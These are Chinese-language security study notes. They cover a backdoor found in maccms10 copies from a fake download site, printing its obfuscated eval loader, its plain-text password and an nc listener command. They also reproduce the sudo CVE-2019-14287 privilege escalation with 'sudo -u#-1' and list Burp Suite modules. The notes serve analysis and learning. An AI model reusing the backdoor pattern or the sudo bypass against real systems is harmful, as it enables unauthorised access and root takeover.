maccms10后门分析
下载网址,是假官网http://www.maccmsv10.com/download.html
Maccms10基于php+mysql的maccms,是苹果的内容管理,方便使用,功能良好,适用范围广
后门所在路径
maccms10extendQcloudSmsSms.php
maccms10extendupyunsrcUpyunApiFormat.php
echo pack('H*',$str);
<?php
error_reporting(E_ERROR); //提示一个误导人的报错
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M'); //ini_set初始化环境
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//MD5加密的,解密密码为WorldFilledWithLove
function s(){
$str = "编码之后的恶意代码";
$str = str_rot13($str); //对恶意代码进行rot13编码
m($str); //用m函数处理
}
function m($str){
global $password; //密码全局变量
$jj = '';
eval($jj.pack('H*',$str).$jj);//pack('H*',$str)对混淆的php进行解码,解码之后的代码经过eval函数处理解析,eval() 函数把字符串按照 PHP 代码来计算。
}
s(); //调用函数
?>
nc -lvvp 7777
l表示本地
vv表示详细信息
p表示端口
sudo提权漏洞(CVE-2019-14287)
sudo是linux系统命令,让普通账号以root身份执行某些命令,比如,安装软件,查看某些配置文件,关机,重启等,如果普通用户需要使用sudo需要修改配置文件,/etc/sudoers,将sudo使用权限赋予该用户
sudo提权漏洞,是一个安全策略绕过问题,去执行某些敏感的命令,cve编号是CVE-2019-14287,影响版本是 sudo版本<1.8.28
漏洞复现
1,查看sudo版本,命令sudo -V
2,修改配置文件,vim /etc/sudoers, root ALL(ALL:ALL) ALL 下添加一行配置 test ALL=(ALL,!root) ALL,需要创建test用户,useradd test passwd test
test ALL=(ALL,!root) ALL
test表示test用户,第一个ALL 表示该用户可以在任意地方使用sudo
第二个ALL,!roo 表示该命令可以被除了root以外的任意用户执行
最后的ALL表示被允许执行
整体表示,test用户可以使用sudo,除了root以外的任意用户都可以去执行
3,切换到test用户,su test,然后使用sudo id,发现没有权限去执行
使用如下方法执行想执行的命令
sudo -u#数字 命令,其中数字范围 -1~4294967295, 命令是系统命令
如果以root身份去执行命令,scope数字使用-1和4294967295 来执行命令
修复方法,更新sudo大于1.8.27
总结,该漏洞比较鸡肋,需要管理员修改配置文件才能达成
burpsite功能模块
proxy 代理
target 目标
spider 爬虫
scanner 漏扫
intruder 暴力破解
repeater 重放,修改数据包发出去,看返回的数据效果,中继
sequencer 定序器,分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。
deconder 编解码
comparer 比较
extender 扩展
project options 项目
user options 用户
MIME 内容类型
add scope 范围